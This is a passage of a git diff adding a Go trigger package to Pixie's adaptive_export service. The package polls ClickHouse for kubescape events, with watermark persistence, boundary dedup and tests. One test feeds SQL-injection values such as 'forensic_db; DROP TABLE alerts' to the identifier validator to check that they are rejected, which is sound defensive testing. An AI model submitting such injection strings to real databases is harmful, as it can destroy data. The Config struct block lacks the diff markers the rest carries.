ticker.Reset(w.batchEvery) + } + + case <-ticker.C: + flush("timer") + } + } +} diff --git a/src/vizier/services/adaptive_export/internal/trigger/BUILD.bazel b/src/vizier/services/adaptive_export/internal/trigger/BUILD.bazel new file mode 100644 index 00000000000..367e6acc1f0 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/trigger/BUILD.bazel @@ -0,0 +1,45 @@ +# Copyright 2018- The Pixie Authors. +# +# Licensed under the Apache License, Version 2.0 (the "License"); +# you may not use this file except in compliance with the License. 
+# You may obtain a copy of the License at +# +# http://www.apache.org/licenses/LICENSE-2.0 +# +# Unless required by applicable law or agreed to in writing, software +# distributed under the License is distributed on an "AS IS" BASIS, +# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +# See the License for the specific language governing permissions and +# limitations under the License. +# +# SPDX-License-Identifier: Apache-2.0 + +load("@io_bazel_rules_go//go:def.bzl", "go_library") +load("//bazel:pl_build_system.bzl", "pl_go_test") + +go_library( + name = "trigger", + srcs = [ + "clickhouse.go", + "watermark.go", + ], + importpath = "px.dev/pixie/src/vizier/services/adaptive_export/internal/trigger", + visibility = ["//src/vizier/services/adaptive_export:__subpackages__"], + deps = [ + "//src/vizier/services/adaptive_export/internal/chhttp", + "//src/vizier/services/adaptive_export/internal/kubescape", + "@com_github_sirupsen_logrus//:logrus", + ], +) + +pl_go_test( + name = "trigger_test", + srcs = [ + "clickhouse_internal_test.go", + "clickhouse_test.go", + "fingerprint_bench_test.go", + "watermark_test.go", + ], + embed = [":trigger"], + deps = ["//src/vizier/services/adaptive_export/internal/kubescape"], +) diff --git a/src/vizier/services/adaptive_export/internal/trigger/clickhouse.go b/src/vizier/services/adaptive_export/internal/trigger/clickhouse.go new file mode 100644 index 00000000000..63fbcd2a793 --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/trigger/clickhouse.go @@ -0,0 +1,498 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. 
// Config configures the trigger. PollInterval defaults to 250ms.
// Hostname is REQUIRED — it scopes every poll to a single node.
type Config struct {
	// Endpoint is the ClickHouse HTTP base URL. New rejects it unless it
	// parses with an http or https scheme and a non-empty host.
	Endpoint string
	// Database and Table name the polled table. New defaults them to
	// "forensic_db" and "kubescape_logs" and only accepts plain
	// identifiers ([A-Za-z_][A-Za-z0-9_]*).
	Database string
	Table    string
	// Username and Password are presumably the ClickHouse credentials;
	// how they are sent is outside this view — TODO confirm.
	Username string
	Password string
	// Hostname is the node whose rows this instance polls. New rejects an
	// empty value.
	Hostname string
	// PollInterval is the poll cadence. Non-positive → 250ms.
	PollInterval time.Duration

	// InitialWatermark is a fallback used ONLY when Watermark is nil
	// AND the persistent store is also empty. The production wiring
	// always supplies Watermark and leaves this zero.
	InitialWatermark uint64

	// Watermark, when non-nil, makes the trigger persistent across
	// restarts: the first poll loads from the store; successful
	// advances are saved back (throttled by WatermarkSaveInterval).
	// nil → behaves like pre-watermark trigger (in-memory only,
	// starts from InitialWatermark; previously the source of the
	// "infinite full-table replay after OOM" bug).
	Watermark WatermarkStore

	// WatermarkSaveInterval throttles persistent writes — we'd
	// otherwise INSERT every 250ms on a busy node. Default 5s.
	WatermarkSaveInterval time.Duration

	// PollLimit caps rows returned per poll. Bounds catch-up work
	// after a restart so a 10h backlog doesn't translate into a
	// single multi-GiB SELECT the HTTP client times out on; instead
	// it drains in N polls of PollLimit rows. Default 10000.
	// 0 → New substitutes the default (10000); an unlimited poll cannot
	// be configured through New. Negative values are rejected by New.
	PollLimit int

	// HTTPTimeout bounds each individual poll. Default 30s; previously
	// hardcoded to 5s, which under any backlog caused every poll to
	// time out mid-stream → watermark never advanced.
	HTTPTimeout time.Duration
}
over the ClickHouse HTTP +// interface, scoped to a single node. +type ClickHouseHTTP struct { + cfg Config + client *http.Client +} + +// New validates Config and returns a ready trigger. +func New(cfg Config) (*ClickHouseHTTP, error) { + if cfg.Endpoint == "" { + return nil, fmt.Errorf("trigger: empty Endpoint") + } + if cfg.Hostname == "" { + return nil, fmt.Errorf("trigger: empty Hostname (operator must run node-local)") + } + u, err := url.Parse(cfg.Endpoint) + if err != nil { + return nil, fmt.Errorf("trigger: invalid Endpoint %q: %w", cfg.Endpoint, err) + } + if u.Scheme != "http" && u.Scheme != "https" { + return nil, fmt.Errorf("trigger: Endpoint %q must use http or https scheme", cfg.Endpoint) + } + if u.Host == "" { + return nil, fmt.Errorf("trigger: Endpoint %q has empty host", cfg.Endpoint) + } + if cfg.Database == "" { + cfg.Database = "forensic_db" + } + if cfg.Table == "" { + cfg.Table = "kubescape_logs" + } + // Validate Database / Table as plain ClickHouse identifiers + // (alphanumeric + underscore, not starting with a digit) so the + // SELECT in fetchSince cannot be subverted by an attacker-controlled + // Config. Hostname is value-quoted via quoteCH; identifiers cannot + // be parameterised, hence validation here. 
+ if !validIdentifier(cfg.Database) { + return nil, fmt.Errorf("trigger: invalid Database identifier %q (must match [A-Za-z_][A-Za-z0-9_]*)", cfg.Database) + } + if !validIdentifier(cfg.Table) { + return nil, fmt.Errorf("trigger: invalid Table identifier %q (must match [A-Za-z_][A-Za-z0-9_]*)", cfg.Table) + } + if cfg.PollInterval <= 0 { + cfg.PollInterval = 250 * time.Millisecond + } + if cfg.WatermarkSaveInterval <= 0 { + cfg.WatermarkSaveInterval = 5 * time.Second + } + if cfg.PollLimit < 0 { + return nil, fmt.Errorf("trigger: PollLimit must be >= 0 (got %d)", cfg.PollLimit) + } + if cfg.PollLimit == 0 { + cfg.PollLimit = 10000 + } + if cfg.HTTPTimeout <= 0 { + cfg.HTTPTimeout = 30 * time.Second + } + return &ClickHouseHTTP{ + cfg: cfg, + client: &http.Client{Timeout: cfg.HTTPTimeout}, + }, nil +} + +// identifierRE accepts plain ClickHouse identifiers — letters, digits, +// underscores; not starting with a digit. Dotted identifiers (e.g. +// "http2_messages.beta") are deliberately rejected here because the +// trigger only ever queries the kubescape ingest table, not a pixie +// observation table. +var identifierRE = regexp.MustCompile(`^[A-Za-z_][A-Za-z0-9_]*$`) + +func validIdentifier(s string) bool { return identifierRE.MatchString(s) } + +// Subscribe starts the background poll loop. The returned channel +// produces kubescape.Event values until ctx is cancelled, then closes. +func (t *ClickHouseHTTP) Subscribe(ctx context.Context) (<-chan kubescape.Event, error) { + out := make(chan kubescape.Event, 64) + go t.run(ctx, out) + return out, nil +} + +func (t *ClickHouseHTTP) run(ctx context.Context, out chan<- kubescape.Event) { + defer close(out) + // Watermark uses event_time as the cursor PLUS a set of row + // fingerprints already pushed at that exact event_time. 
This + // closes the race where two kubescape rows share the same + // event_time but the second arrives after our previous poll: the + // query is `event_time >= watermark` (inclusive) and we skip rows + // whose fingerprint we have already seen at the boundary. + // + // Cold-start order: persistent store > InitialWatermark > 0. + // The persistent store is the production answer to "operator + // OOMed, restarts, replays 10h of kubescape_logs from 0, every + // poll times out, never recovers" — without it any restart on + // a busy node is permanently stuck. + watermark := t.cfg.InitialWatermark + if t.cfg.Watermark != nil { + // Bound the load with its own context so a flaky CH doesn't + // block start-up indefinitely. The trigger then falls back + // to InitialWatermark and we log the failure loudly. + loadCtx, cancel := context.WithTimeout(ctx, t.cfg.HTTPTimeout) + wm, ok, err := t.cfg.Watermark.Load(loadCtx, t.cfg.Hostname, t.cfg.Table) + cancel() + switch { + case err != nil: + log.WithError(err).Warn("trigger: persistent watermark load failed; using InitialWatermark") + case ok: + watermark = wm + log.WithField("watermark", wm).Info("trigger: resumed from persistent watermark") + default: + log.WithField("initial", t.cfg.InitialWatermark). + Info("trigger: no persistent watermark; using InitialWatermark") + } + } + // Cursor is canonical NANOS (F8). Normalize whatever we loaded so a + // pre-fix persisted seconds watermark (or a non-seconds InitialWatermark) + // is interpreted on the same scale as chNormEventTimeNanos in the SQL. + watermark = normalizeEventTimeNanos(watermark) + seenAtBoundary := map[string]bool{} + ticker := time.NewTicker(t.cfg.PollInterval) + defer ticker.Stop() + + // Throttle persistent writes: every successful advance is in + // memory immediately, but only flushed to CH at most every + // WatermarkSaveInterval. dirty tracks whether the in-memory + // watermark differs from what was last persisted. 
+ // + // The flush is invoked INSIDE pollOnce (not from a ticker case + // in the for/select), because the initial pollOnce on a busy + // node can block for tens of seconds while it drains 10k events + // down a back-pressured channel — during which time the for/ + // select isn't running and a saveTicker.C tick would never be + // observed. Throttling is done with a time.Time comparison. + lastSaved := watermark + var lastSaveTime time.Time + dirty := false + flushWatermark := func() { + if !dirty || t.cfg.Watermark == nil || watermark == lastSaved { + return + } + if !lastSaveTime.IsZero() && time.Since(lastSaveTime) < t.cfg.WatermarkSaveInterval { + return + } + saveCtx, cancel := context.WithTimeout(ctx, t.cfg.HTTPTimeout) + err := t.cfg.Watermark.Save(saveCtx, t.cfg.Hostname, t.cfg.Table, watermark) + cancel() + if err != nil { + log.WithError(err).WithField("watermark", watermark). + Warn("trigger: persistent watermark save failed; will retry next interval") + return + } + lastSaved = watermark + lastSaveTime = time.Now() + dirty = false + } + // Best-effort final flush so a clean shutdown doesn't lose up + // to WatermarkSaveInterval of progress. + defer func() { + if t.cfg.Watermark != nil && dirty { + saveCtx, cancel := context.WithTimeout(context.Background(), t.cfg.HTTPTimeout) + defer cancel() + if err := t.cfg.Watermark.Save(saveCtx, t.cfg.Hostname, t.cfg.Table, watermark); err != nil { + log.WithError(err).Warn("trigger: shutdown watermark save failed") + } + } + }() + + pollOnce := func() { + rows, maxSeen, err := t.fetchSince(ctx, watermark) + // Partial-read tolerance: when the body read is cut short by + // HTTP timeout / connection reset, fetchSince returns the rows + // it managed to parse + err. We still process those rows so + // the watermark advances by what we got; failing to do so was + // the second half of the "stuck forever" bug. 
+ if err != nil { + if len(rows) == 0 { + log.WithError(err).Warn("trigger: poll failed") + return + } + log.WithError(err).WithField("partial_rows", len(rows)). + Warn("trigger: poll partial — advancing on what parsed") + } + nextSeen := map[string]bool{} + // Periodic in-loop save: when pollOnce is draining a large + // initial backlog, the watermark advances long before the + // loop exits. Calling flushWatermark every N rows means the + // persistent watermark catches up even mid-drain, so a crash + // during the drain doesn't replay the whole backlog. Combined + // with the time-based throttle inside flushWatermark, this + // produces at most one persistent INSERT per WatermarkSaveInterval. + const saveEveryN = 256 + skippedAtBoundary := 0 + for i, row := range rows { + fp := rowFingerprint(row) + // Cursor comparisons are in NORMALIZED nanos (F8): the raw + // event_time unit is not enforced, so compare on the same scale + // as the SQL filter (chNormEventTimeNanos) and maxSeen. + evn := normalizeEventTimeNanos(row.EventTime) + if evn == watermark && seenAtBoundary[fp] { + skippedAtBoundary++ + continue // already pushed in a prior poll at this exact boundary + } + ev, err := kubescape.Extract(row) + if err != nil { + log.WithError(err).Debug("trigger: skip incomplete row") + continue + } + // Promote the per-row (normalized) event_time into the watermark + // immediately so flushWatermark below can persist mid-drain. 
+ if evn > watermark { + watermark = evn + dirty = true + } + select { + case out <- ev: + case <-ctx.Done(): + return + } + if evn == maxSeen { + nextSeen[fp] = true + } + if i > 0 && i%saveEveryN == 0 { + flushWatermark() + } + } + if maxSeen > watermark { + watermark = maxSeen + seenAtBoundary = nextSeen + dirty = true + } else if maxSeen == watermark { + // no progress this tick — preserve boundary set, optionally extend + for fp := range nextSeen { + seenAtBoundary[fp] = true + } + // Paging escape: if every row returned was a boundary-skip AND + // the response was at PollLimit capacity, there may be additional + // rows at the same normalized event_time that we will never reach + // (the SQL ORDER BY has no secondary key, so LIMIT always returns + // the same PollLimit rows from the boundary). Advance the watermark + // by 1 nanosecond to escape the boundary. In practice this means + // at most one nanosecond's worth of events are not re-delivered on + // the next poll, which is acceptable: the fingerprint dedup already + // tolerates boundary overlap, and we prefer forward progress over + // an infinite loop. + if skippedAtBoundary > 0 && len(nextSeen) == 0 && len(rows) >= t.cfg.PollLimit { + watermark++ + seenAtBoundary = map[string]bool{} + dirty = true + log.WithField("watermark", watermark). + Warn("trigger: boundary paging escape — advanced watermark by 1ns to unblock poll") + } + } + // Final flush at end of pollOnce — also throttled. + flushWatermark() + } + + pollOnce() + for { + select { + case <-ctx.Done(): + return + case <-ticker.C: + pollOnce() + } + } +} + +// rowFingerprint hashes the row's content so we can dedupe at the +// watermark boundary without trusting kubescape to give us a unique row id. 
+func rowFingerprint(r kubescape.Row) string { + h := sha256.New() + _, _ = fmt.Fprintf(h, "%d\x00%s\x00%s\x00%s\x00%s", + r.EventTime, r.RuleID, r.Hostname, r.K8sDetails, r.ProcessDetails) + return hex.EncodeToString(h.Sum(nil)) +} + +// normalizeEventTimeNanos maps a raw kubescape event_time (UInt64, whose unit +// the pipeline does not enforce) to canonical UNIX NANOSECONDS using the same +// magnitude thresholds as controller.eventTimeToTime. This is the fix for the +// watermark-poison bug (FINDINGS_AND_BACKLOG F8): the trigger's cursor is a +// monotonic high-water-mark, so without a single canonical unit a stray row in +// a larger unit (e.g. one nanos row, ~1.78e18) drives the watermark past every +// real seconds row (~1.78e9) and AE silently stops processing forever. The +// cursor + the SQL filter both operate on the normalized value so units are +// always comparable. +func normalizeEventTimeNanos(et uint64) uint64 { + switch { + case et < 1e10: + return et * 1_000_000_000 // seconds → nanos + case et < 1e13: + return et * 1_000_000 // millis → nanos + default: + return et // already nanos + } +} + +// chNormEventTimeNanos is the ClickHouse expression equivalent of +// normalizeEventTimeNanos — used in the trigger SELECT so the >= watermark +// filter and ORDER BY are unit-agnostic server-side. (UInt64 headroom: the +// largest pre-normalization input that hits the *1e9 branch is <1e10, so the +// product is <1e19 < 2^64.) +const chNormEventTimeNanos = "multiIf(event_time < 10000000000, event_time * 1000000000, " + + "event_time < 10000000000000, event_time * 1000000, event_time)" + +func (t *ClickHouseHTTP) fetchSince(ctx context.Context, watermark uint64) ([]kubescape.Row, uint64, error) { + q := url.Values{} + // LIMIT bounds per-poll work. ORDER BY event_time + LIMIT N means + // catch-up from a stale watermark drains in ceil(backlog/N) polls + // of small responses instead of one giant scan. 
Without this, an + // operator that restarted into a multi-hour backlog could never + // recover — every unbounded query exceeded HTTPTimeout. + // Filter + order on the NORMALIZED (nanos) event_time so the watermark + // cursor is unit-agnostic (F8 fix). watermark is already in nanos. + q.Set("query", fmt.Sprintf( + "SELECT RuleID, RuntimeK8sDetails, RuntimeProcessDetails, event_time, hostname "+ + "FROM %s.%s "+ + "WHERE hostname = %s AND %s >= %d "+ + "ORDER BY %s LIMIT %d FORMAT JSONEachRow", + t.cfg.Database, t.cfg.Table, quoteCH(t.cfg.Hostname), + chNormEventTimeNanos, watermark, chNormEventTimeNanos, t.cfg.PollLimit)) + req, err := http.NewRequestWithContext(ctx, http.MethodGet, + t.cfg.Endpoint+"/?"+q.Encode(), nil) + if err != nil { + return nil, 0, err + } + if t.cfg.Username != "" { + req.SetBasicAuth(t.cfg.Username, t.cfg.Password) + } + resp, err := t.client.Do(req) + if err != nil { + return nil, 0, err + } + defer resp.Body.Close() + if resp.StatusCode/100 != 2 { + body, _ := io.ReadAll(io.LimitReader(resp.Body, 4096)) + return nil, 0, fmt.Errorf("HTTP %d: %s", resp.StatusCode, strings.TrimSpace(string(body))) + } + return parseJSONEachRow(resp.Body) +} + +// parseJSONEachRow streams JSONEachRow output line-by-line from r. +// Streaming (vs io.ReadAll into a []byte) bounds memory at one row +// regardless of how large the ClickHouse result set is. +// +// Malformed rows are LOGGED + SKIPPED, never fatal: a single bad line +// must not block watermark advancement and re-pin the bad row on every +// subsequent poll. Only an unrecoverable scanner error (e.g. line +// exceeds the 16 MiB buffer) fails the call. 
+func parseJSONEachRow(r io.Reader) ([]kubescape.Row, uint64, error) { + type rawRow struct { + RuleID string `json:"RuleID"` + RuntimeK8sDetails string `json:"RuntimeK8sDetails"` + RuntimeProcessDetails string `json:"RuntimeProcessDetails"` + EventTime json.RawMessage `json:"event_time"` + Hostname string `json:"hostname"` + } + var ( + rows []kubescape.Row + maxSeen uint64 + ) + scanner := bufio.NewScanner(r) + scanner.Buffer(make([]byte, 1<<20), 1<<24) + for scanner.Scan() { + line := bytes.TrimSpace(scanner.Bytes()) + if len(line) == 0 { + continue + } + var rr rawRow + if err := json.Unmarshal(line, &rr); err != nil { + log.WithError(err).Debug("trigger: skip malformed JSON row") + continue + } + ev, err := parseUint64Loose(rr.EventTime) + if err != nil { + log.WithError(err).Debug("trigger: skip row with bad event_time") + continue + } + rows = append(rows, kubescape.Row{ + EventTime: ev, + RuleID: rr.RuleID, + Hostname: rr.Hostname, + K8sDetails: rr.RuntimeK8sDetails, + ProcessDetails: rr.RuntimeProcessDetails, + }) + // maxSeen is the cursor max in NORMALIZED nanos (F8): with an + // unenforced unit the raw max is not necessarily the time-max. + if n := normalizeEventTimeNanos(ev); n > maxSeen { + maxSeen = n + } + } + if err := scanner.Err(); err != nil { + // Partial-read tolerance: return whatever parsed cleanly along + // with the error so the caller can still advance the watermark. + // Without this, an HTTP body read cut off mid-stream (the + // classic 5s-timeout-on-2GB-response failure mode) discarded + // ~all parsed rows and pinned the watermark in place. + return rows, maxSeen, err + } + return rows, maxSeen, nil +} + +func parseUint64Loose(raw json.RawMessage) (uint64, error) { + s := strings.TrimSpace(string(raw)) + s = strings.Trim(s, `"`) + return strconv.ParseUint(s, 10, 64) +} + +// chLiteralEscaper — hoisted to a package-level var so we don't allocate +// a Replacer per call (quoteCH is hot in rowFingerprint). 
+var chLiteralEscaper = strings.NewReplacer(`\`, `\\`, `'`, `\'`) + +func quoteCH(s string) string { + return "'" + chLiteralEscaper.Replace(s) + "'" +} diff --git a/src/vizier/services/adaptive_export/internal/trigger/clickhouse_internal_test.go b/src/vizier/services/adaptive_export/internal/trigger/clickhouse_internal_test.go new file mode 100644 index 00000000000..8ca780fc3db --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/trigger/clickhouse_internal_test.go @@ -0,0 +1,104 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. +// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package trigger + +import ( + "context" + "net/http" + "net/http/httptest" + "strconv" + "strings" + "sync" + "testing" + "time" +) + +// TestNormalizeEventTimeNanos pins the unit normalization at the current epoch +// (the magnitude heuristic is exact for present-day timestamps). This is the +// core of the F8 fix: seconds, millis and nanos all map to the SAME nanos scale, +// so a mixed-unit row cannot drive the watermark past real seconds rows. 
+func TestNormalizeEventTimeNanos(t *testing.T) { + const sec = uint64(1781590000) // ~now in seconds + const milli = uint64(1781590000_000) // same instant in millis + const nano = uint64(1781590000_000000000) // same instant in nanos + cases := []struct { + in, want uint64 + }{ + {sec, nano}, + {milli, nano}, + {nano, nano}, + {0, 0}, + } + for _, c := range cases { + if got := normalizeEventTimeNanos(c.in); got != c.want { + t.Errorf("normalizeEventTimeNanos(%d) = %d, want %d", c.in, got, c.want) + } + } + // All three units for the SAME instant must collapse to one value, so the + // HWM cursor is unit-agnostic. + if normalizeEventTimeNanos(sec) != normalizeEventTimeNanos(nano) || + normalizeEventTimeNanos(milli) != normalizeEventTimeNanos(nano) { + t.Fatalf("same-instant s/ms/ns did not normalize equal: s=%d ms=%d ns=%d", + normalizeEventTimeNanos(sec), normalizeEventTimeNanos(milli), normalizeEventTimeNanos(nano)) + } +} + +// TestFetchSinceFiltersOnNormalizedEventTime asserts the trigger SELECT gates on +// the NORMALIZED event_time (server-side), not the raw column — the fix that +// stops a larger-unit row from poisoning the watermark (F8). It captures the +// query the trigger sends to ClickHouse. 
+func TestFetchSinceFiltersOnNormalizedEventTime(t *testing.T) { + var mu sync.Mutex + var gotQuery string + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + q := r.URL.Query().Get("query") + mu.Lock() + gotQuery = q + mu.Unlock() + w.WriteHeader(200) // empty body = 0 rows, valid JSONEachRow + })) + defer srv.Close() + + trg, err := New(Config{Endpoint: srv.URL, Hostname: "node-1", PollInterval: time.Second}) + if err != nil { + t.Fatalf("New: %v", err) + } + + const wmNanos = uint64(1781590000_000000000) + ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second) + defer cancel() + if _, _, err := trg.fetchSince(ctx, wmNanos); err != nil { + t.Fatalf("fetchSince: %v", err) + } + + mu.Lock() + q := gotQuery + mu.Unlock() + + if !strings.Contains(q, chNormEventTimeNanos) { + t.Errorf("query does not normalize event_time; want %q in:\n%s", chNormEventTimeNanos, q) + } + // The >= bound must compare the normalized expression against the nanos + // watermark, not the raw column. + wantPred := chNormEventTimeNanos + " >= " + strconv.FormatUint(wmNanos, 10) + if !strings.Contains(q, wantPred) { + t.Errorf("query filter is not normalized-vs-nanos-watermark; want %q in:\n%s", wantPred, q) + } + if strings.Contains(q, "event_time >= ") { + t.Errorf("query still uses RAW event_time filter (poison-prone):\n%s", q) + } +} diff --git a/src/vizier/services/adaptive_export/internal/trigger/clickhouse_test.go b/src/vizier/services/adaptive_export/internal/trigger/clickhouse_test.go new file mode 100644 index 00000000000..0595e67392f --- /dev/null +++ b/src/vizier/services/adaptive_export/internal/trigger/clickhouse_test.go @@ -0,0 +1,243 @@ +// Copyright 2018- The Pixie Authors. +// +// Licensed under the Apache License, Version 2.0 (the "License"); +// you may not use this file except in compliance with the License. 
+// You may obtain a copy of the License at +// +// http://www.apache.org/licenses/LICENSE-2.0 +// +// Unless required by applicable law or agreed to in writing, software +// distributed under the License is distributed on an "AS IS" BASIS, +// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. +// See the License for the specific language governing permissions and +// limitations under the License. +// +// SPDX-License-Identifier: Apache-2.0 + +package trigger + +import ( + "context" + "net/http" + "net/http/httptest" + "strings" + "sync/atomic" + "testing" + "time" +) + +const canonicalRowJSON = `{"RuleID":"R1005","RuntimeK8sDetails":"{\"podName\":\"redis-578d5dc9bd-kjj78\",\"podNamespace\":\"redis\"}","RuntimeProcessDetails":"{\"processTree\":{\"pid\":106040,\"comm\":\"redis-server\"}}","event_time":"1744477360303026359","hostname":"node-1"}` + +// TestTrigger_Polls_HostnameAndWatermark — query carries +// WHERE hostname=… AND event_time>=… . Race-free: the server pushes +// each query string into a buffered channel; the test waits for the +// SECOND request deterministically (no fixed sleep, no shared +// non-atomic variable). 
+func TestTrigger_Polls_HostnameAndWatermark(t *testing.T) { + queries := make(chan string, 8) + var calls int64 + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + n := atomic.AddInt64(&calls, 1) + queries <- r.URL.Query().Get("query") + if n == 1 { + _, _ = w.Write([]byte(canonicalRowJSON + "\n")) + return + } + _, _ = w.Write([]byte("")) + })) + defer srv.Close() + tr, err := New(Config{Endpoint: srv.URL, Hostname: "node-1", PollInterval: 30 * time.Millisecond}) + if err != nil { + t.Fatalf("New: %v", err) + } + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + ch, _ := tr.Subscribe(ctx) + select { + case ev := <-ch: + if ev.Target.Pod != "redis-578d5dc9bd-kjj78" { + t.Fatalf("Pod = %q", ev.Target.Pod) + } + if ev.Target.PID != 106040 { + t.Fatalf("PID = %d", ev.Target.PID) + } + if ev.Hostname != "node-1" { + t.Fatalf("Hostname = %q", ev.Hostname) + } + case <-time.After(500 * time.Millisecond): + t.Fatalf("timeout waiting for first event") + } + // Drain the first query, then wait for the second (advanced + // watermark) — channel-based, so no fixed sleep races. + <-queries + var lastQuery string + select { + case lastQuery = <-queries: + case <-time.After(500 * time.Millisecond): + t.Fatalf("timeout waiting for second poll") + } + if !strings.Contains(lastQuery, "hostname = 'node-1'") { + t.Fatalf("query missing hostname filter: %q", lastQuery) + } + // post-#10/trigger-unit-normalize: SQL wraps event_time in multiIf(...); + // 1.744e18 is already ns-scale so it passes through unchanged. + if !strings.Contains(lastQuery, ") >= 1744477360303026359") { + t.Fatalf("watermark didn't advance to inclusive boundary: %q", lastQuery) + } +} + +// TestTrigger_RequiresHostname — defensive: refuses empty hostname. 
+func TestTrigger_RequiresHostname(t *testing.T) { + if _, err := New(Config{Endpoint: "http://x", Hostname: ""}); err == nil { + t.Fatalf("empty Hostname not rejected") + } +} + +// TestTrigger_ContextCancellationClosesChannel — clean shutdown. +func TestTrigger_ContextCancellationClosesChannel(t *testing.T) { + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {})) + defer srv.Close() + tr, _ := New(Config{Endpoint: srv.URL, Hostname: "node-1", PollInterval: 30 * time.Millisecond}) + ctx, cancel := context.WithCancel(context.Background()) + ch, _ := tr.Subscribe(ctx) + cancel() + select { + case _, ok := <-ch: + if ok { + t.Fatalf("channel produced after cancel") + } + case <-time.After(300 * time.Millisecond): + t.Fatalf("channel not closed within 300ms of cancel") + } +} + +// TestTrigger_HTTPErrorContinues — transient 5xx → retry, system stable. +func TestTrigger_HTTPErrorContinues(t *testing.T) { + var calls int64 + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + n := atomic.AddInt64(&calls, 1) + if n == 1 { + w.WriteHeader(503) + return + } + _, _ = w.Write([]byte(canonicalRowJSON + "\n")) + })) + defer srv.Close() + tr, _ := New(Config{Endpoint: srv.URL, Hostname: "node-1", PollInterval: 30 * time.Millisecond}) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + ch, _ := tr.Subscribe(ctx) + select { + case ev := <-ch: + if ev.Target.Comm == "" { + t.Fatalf("got empty Target after recovery") + } + case <-time.After(500 * time.Millisecond): + t.Fatalf("trigger did not recover from transient HTTP 503") + } +} + +// TestTrigger_DedupesAtWatermarkBoundary — same-event_time rows that +// arrive in a later poll than they were already observed must NOT be +// re-emitted. Distinct rows at the same boundary timestamp must still +// be emitted (only the duplicate is suppressed). 
+func TestTrigger_DedupesAtWatermarkBoundary(t *testing.T) { + const distinctRowJSON = `{"RuleID":"R0006","RuntimeK8sDetails":"{\"podName\":\"redis-578d5dc9bd-kjj78\",\"podNamespace\":\"redis\"}","RuntimeProcessDetails":"{\"processTree\":{\"pid\":222222,\"comm\":\"redis-cli\"}}","event_time":"1744477360303026359","hostname":"node-1"}` + var calls int64 + srv := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) { + n := atomic.AddInt64(&calls, 1) + switch n { + case 1: + // First poll emits the canonical row. + _, _ = w.Write([]byte(canonicalRowJSON + "\n")) + case 2: + // Second poll: server "re-discovers" the SAME row at the + // boundary timestamp PLUS one DISTINCT row at the same + // event_time. The trigger must suppress the duplicate + // fingerprint and pass through the distinct one. + _, _ = w.Write([]byte(canonicalRowJSON + "\n" + distinctRowJSON + "\n")) + default: + _, _ = w.Write([]byte("")) + } + })) + defer srv.Close() + + tr, _ := New(Config{Endpoint: srv.URL, Hostname: "node-1", PollInterval: 30 * time.Millisecond}) + ctx, cancel := context.WithCancel(context.Background()) + defer cancel() + ch, _ := tr.Subscribe(ctx) + + // Collect events for ~250 ms — long enough for at least 3 polls. + deadline := time.Now().Add(250 * time.Millisecond) + var got []uint64 // PIDs we observed + for time.Now().Before(deadline) { + select { + case ev := <-ch: + got = append(got, ev.Target.PID) + case <-time.After(20 * time.Millisecond): + } + } + // Expect exactly 2 events: PID 106040 (canonical, emitted once + // even though server returned it twice) and PID 222222 (distinct + // row at same boundary, emitted exactly once). 
+ if len(got) != 2 { + t.Fatalf("got %d events, want 2 (canonical + distinct, no dup); pids=%v", len(got), got) + } + canonicalSeen, distinctSeen := 0, 0 + for _, pid := range got { + switch pid { + case 106040: + canonicalSeen++ + case 222222: + distinctSeen++ + } + } + if canonicalSeen != 1 { + t.Fatalf("canonical row emitted %d times, want 1 (dedup failed)", canonicalSeen) + } + if distinctSeen != 1 { + t.Fatalf("distinct same-event_time row emitted %d times, want 1 (over-aggressive dedup)", distinctSeen) + } +} + +// TestTrigger_RejectsInvalidIdentifiers — defensive: SQL injection via +// Database/Table config is refused at construction time. +func TestTrigger_RejectsInvalidIdentifiers(t *testing.T) { + for _, bad := range []string{ + "forensic_db; DROP TABLE alerts", + "db with space", + "123starts_with_digit", + "backtick`injection", + "forensic_db.kubescape_logs", // dotted not allowed for this table param + } { + _, err := New(Config{Endpoint: "http://x", Hostname: "node-1", Database: bad}) + if err == nil { + t.Errorf("New accepted bad Database %q; expected error", bad) + } + _, err = New(Config{Endpoint: "http://x", Hostname: "node-1", Table: bad}) + if err == nil { + t.Errorf("New accepted bad Table %q; expected error", bad) + } + } +} + +// TestTrigger_BadRowSkipped — incomplete kubescape row is skipped, good rows still arrive. 
